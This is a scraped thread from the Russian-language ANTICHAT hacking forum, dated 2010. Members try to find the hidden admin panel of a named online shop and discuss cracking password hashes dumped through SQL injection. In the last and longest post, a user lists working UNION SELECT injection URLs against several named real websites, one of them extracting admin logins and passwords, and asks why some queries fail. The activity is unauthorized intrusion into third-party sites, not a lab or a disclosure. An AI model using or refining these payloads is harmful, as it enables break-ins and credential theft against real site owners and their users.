ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.11.2010, 19:35
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Сообщение от SEWERN
SEWERN said:
Кто может помочь с поисками адм http://www.shopzooly.com ?
адм не ВП , а "OnePound"
|
|
|
02.11.2010, 19:37
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от -PRIVAT-
-PRIVAT- said:
http://www.shopzooly.com/login.php
кэп говорит что это форма авторизации юзеров, а не админов.
|
|
|
|
02.11.2010, 19:49
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Сообщение от d1v
d1v said:
кэп говорит что это форма авторизации юзеров, а не админов.
Возможно и админа авторизует. Часто так бывает, знаю по опыту.
|
|
|
|
02.11.2010, 19:49
|
|
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612
Репутация:
94
|
|
Сообщение от d1v
d1v said:
кэп говорит что это форма авторизации юзеров, а не админов.
верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%).
Но найти ее трудновато (( "robots.txt" нету(((
|
|
|
|
02.11.2010, 21:00
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от SEWERN
SEWERN said:
верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%).
Но найти ее трудновато (( "robots.txt" нету(((
просканил админфайндером и интеллитемпером - результата нет.
вывод: админка в рандомной папке, на другом порту или ваще локальная.
|
|
|
|
02.11.2010, 22:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
8669
Репутация:
5
|
|
Есть SQL inj
Определил названия таблиц,названия столбцов
Есть в users два таких столбца : password и current_hash.
В котором из них пароль хранится ? В password - MYSQL хэш (расшифровал его,но при авторизации ошибку выдает),в current_hash - md5
|
|
|
|
02.11.2010, 22:49
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
2JohnnyBGoode возможно кэпую, но данные из current_hash расшифровать не пробовал?
|
|
|
|
02.11.2010, 22:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
8669
Репутация:
5
|
|
Сообщение от Bb0y
Bb0y said:
2
JohnnyBGoode
возможно кэпую, но данные из current_hash расшифровать не пробовал?
пытался,положительного результата не достиг
И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся
|
|
|
|
03.11.2010, 00:53
|
|
Познающий
Регистрация: 15.09.2008
Сообщений: 54
Провел на форуме:
612815
Репутация:
46
|
|
Сообщение от JohnnyBGoode
JohnnyBGoode said:
пытался,положительного результата не достиг
И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся
Ну тогда пробуй расшифровать current_hash сам неможеш выложи на ачат
|
|
|
|
03.11.2010, 13:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
1094
Репутация:
0
|
|
Всем добрый день. Все вопросы по Sql inj
Первый вопрос, что делать если не могу найти таблицу пользователей, где то встречал уже этот же вопрос, но поиском найти не смог.
На пример :
Сообщение от None
http://cib.net.ua/catalog.php?catalog_mode=np&list_mode=details&cat= 12&ucat=124&code=1900+and+1=0+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,table_name+from +information_schema.tables+limit+0,100+--+
Всё перебрал а такой таблицы найти не смог.
Я подумал, что делаю что то не так, и решил посмотреть в теме Sql инъекции.
Взял последний сайт. Убрал то что там было, и решил сделать сам всё с самого начала.
Вот так перебрал до 50, результат - ничего не найдено
Сообщение от None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,table_name,4,5,database(),7,8,9+from+inf ormation_schema.tables+limit+50,100+--+
Но, тут возникает вопрос, ведь tracy как то узнал
Сообщение от None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,file_priv,4 ,5,6,7,8,9+from+mysql.user+where+user='alexey1'+--+
вопрос как? растолкуйте пожалуйста этот момент.
==================================
Последний вопрос, возможно самый тупой.
У меня всё получилось, я узнал логин и пароль админа
Сообщение от None
http://www.stepka.com.ua/?mod=viewProduct&id='3'+and+1=0+union+select+1,2,3 ,4,5,concat_ws(0x03a,login,passwrd),7,8,9+FROM+use rs
расшифровал хэш, НО я могу найти админку, поискав по форуму нашёл 1 скрипт и какой то софт, для автоматизации этого процесса, но прогнав этот сайт, всё равно ничего не нашёл. Возможно что то посоветуете?
===================================
Ещё вспомнил
Вот так, если поля логин и пассворд
Сообщение от None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,column_name,4,5,database(),7,8,9+from+in formation_schema.columns+where+table_name='USER'+l imit+11,100+--+
Но после такого запроса
Сообщение от None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,login,4,5,password,7,8,9+from+USER+limit +0,100+--+
получаю
Сообщение от None
Table 'krost.USER' doesn't exist
Что я делаю не так? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
